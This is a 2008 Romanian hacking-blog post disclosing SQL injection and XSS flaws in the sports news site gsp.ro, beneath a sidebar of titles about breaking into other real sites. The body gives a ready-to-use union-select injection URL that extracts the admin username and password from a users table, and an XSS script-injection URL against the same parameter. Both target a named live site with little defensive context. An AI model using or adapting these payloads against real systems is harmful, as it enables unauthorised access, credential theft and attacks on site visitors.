SQL Injection in gsp.ro |

Recent Comments

Loading....

Loading....

Yahoo! again - XSS in Uncategorized (357 Visits)
Yahoo! again - bad settings? in Uncategorized (252 Visits)
Fanii nostri in Uncategorized (183 Visits)
Frustrant in Uncategorized (146 Visits)
La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
... in Uncategorized (38 Visits)
XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
Hackersblog.org is now blog.rstcenter.com in (1781 Visits)
O mica dar importanta precizare in (1389 Visits)
Twitter in (821 Visits)
This is the end in (803 Visits)
Ce servicii de mail folositi? in (791 Visits)
Un nou membru in (748 Visits)
La multi ani România, la multi ani românilor in (737 Visits)
Inca o pierdere de timp in (690 Visits)
De reţinut in (648 Visits)
Azi este ziua userilor hackersblog.org in (625 Visits)
SMS scam (1) in (583 Visits)
Hi5.com coders read this in (581 Visits)
Dezinformare sau proasta informare? in (578 Visits)
Phishing Raiffeisen cu atasament html in (534 Visits)
Phishing Bancpost in (502 Visits)
Si tentativele de phishing pot fi amuzante in (435 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2789 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2707 Visits)
Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1171 Visits)
[Utilitare] Suna gratis de pe internet sau de pe iPhone in (1147 Visits)
Ce nu se invata la scoala - (D)DOS (5) in (975 Visits)
Virusi in clipuri video [how to] in (894 Visits)
Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (743 Visits)
Yahoo! redirects - a big issue (with video) in (585 Visits)
Internet vs. privacy (1) in (486 Visits)
Ca musca in... in (448 Visits)
RedTube.com ... The Free Sex Video Community in (13218 Visits)
usa.kaspersky.com hacked ... full database acces , sql injection in (5203 Visits)
libertatea.ro vulnerabil la (blind) sql injection in (3009 Visits)
Pwning cam girls for fun in (2650 Visits)
Telegraph.co.uk hacked, sql injection in (2628 Visits)
Facebook hacked - sql injection in (2514 Visits)
Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2485 Visits)
F-Secure.com - SQL Injection + Cross Site Scripting in (1815 Visits)
[Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1804 Visits)
Wtf Avira? in (1764 Visits)
Christopher "moot" Poole: The case for anonymity online in (1536 Visits)
Digital Photocopiers Loaded With Secrets in (1476 Visits)
Hacker Uses XSS and Google Street View Data to Determine Physical Location in (705 Visits)
Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (623 Visits)
Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (613 Visits)
Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (476 Visits)
PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (410 Visits)
Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (394 Visits)
[Video] The History Of Hacking in (382 Visits)
Email Security - Why You Should Encrypt Your Email - Part One in (377 Visits)
Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3516 Visits)
RNS vs. RAI - citizenreport.rai.it hacked. in (3326 Visits)
Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (3150 Visits)
Se poate sparge parola de Yahoo? in (2655 Visits)
Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2519 Visits)
Free SMS time, TrimiteSMS.ro in (2512 Visits)
Gmail uber hacking in (2368 Visits)
Cancan.ro spart pentru a doua oara intr-o zi in (2302 Visits)
Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2289 Visits)
Stiri cu antena3 in (2228 Visits)

Loading....

SQL Injection in gsp.ro

Posted by 2fingers in English News

Posted on November 18th, 2008

Vulnerabilitate gasita de unu_1234567.

Un site Romanesc cu trafic foarte mare are aceleasi probleme ca multe alte site-uri despre care am scris in articolele noastre. Un sql injection in Gazeta Sporturilor ne arata cat de vulnerabili pot fii chiar si cei ce domina online-ul din Romania.

Sintaxa pentru admin si parola de admin: http://www.gsp.ro/index.php?section=euro2008&screen=lot&echipa_id=123499%20union%20all%20select%201,concat(name,0×3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20adm_users%20limit%200,1–

Screenshots:

XSS: http://www.gsp.ro/index.php?section=euro2008&screen=lot&echipa_id=”><script>alert(“XSS”)</script>

Related Posts

January 24, 2009 -- Asa chiar nu e voie – mydomain.myx.net
December 9, 2008 -- Lectie de blind Sql injection … material didactic: site-ul gsp.ro
December 8, 2008 -- Asa sa platesti cu credit card-ul pe gsptv.ro…(sql injection)
December 8, 2008 -- Yahoo.com SQL Injection, XSS [se intampla si la case mari]
November 29, 2008 -- Pcfarm.ro, SQL Injection, XSS

Leave a Reply

Studio videochat bucuresti Studio videochat Bucuresti
Download Muzica Filme
Studio videochat Iasi videochat Iasi